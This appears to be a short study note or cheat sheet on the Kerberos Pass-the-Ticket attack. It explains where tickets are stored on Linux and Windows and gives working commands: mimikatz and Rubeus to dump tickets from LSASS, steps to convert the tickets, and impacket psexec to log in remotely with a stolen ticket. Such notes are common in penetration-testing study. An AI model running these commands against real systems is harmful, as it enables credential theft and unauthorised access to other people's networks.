5. Pass the ticket
- similar to Pass The Key
- steals ticket instead of requesting ticket via known hash
- in Linux, tickets are stored in credential caches (ccache)
- 3 main locations:
- files, /tmp/krb5cc_%{uid} (default)
- Kernel Keyrings - specail space in Linux kernel for storing keys
- process memory - used when only one process needs to use the ticket
- 3 main locations:
- in Windows, tickets are handled and stored by the LSASS (Local Security Authority Subsystem Service) process responsible for security.
Tools: impacket’s psexec.py (Linux), mimikatz & Rubeus (Windows)
In Windows
.\mimikatz.exe
sekurlsa::tickets /export
or use Rubeus to export the tickets
.\Rubeus dump
In Kali, perform Pass The Ticket attack using psexec.py
export KRB5CCNAME=krb5cc_..
psexec.py DOMAIN/USERNAME@$IP -k -no-pass
python ticket_converter.py ticket.kirbi ticket.ccache
kirbi2ccache ticket.kirbi ticket.ccache
klist -f -c krb5cc_..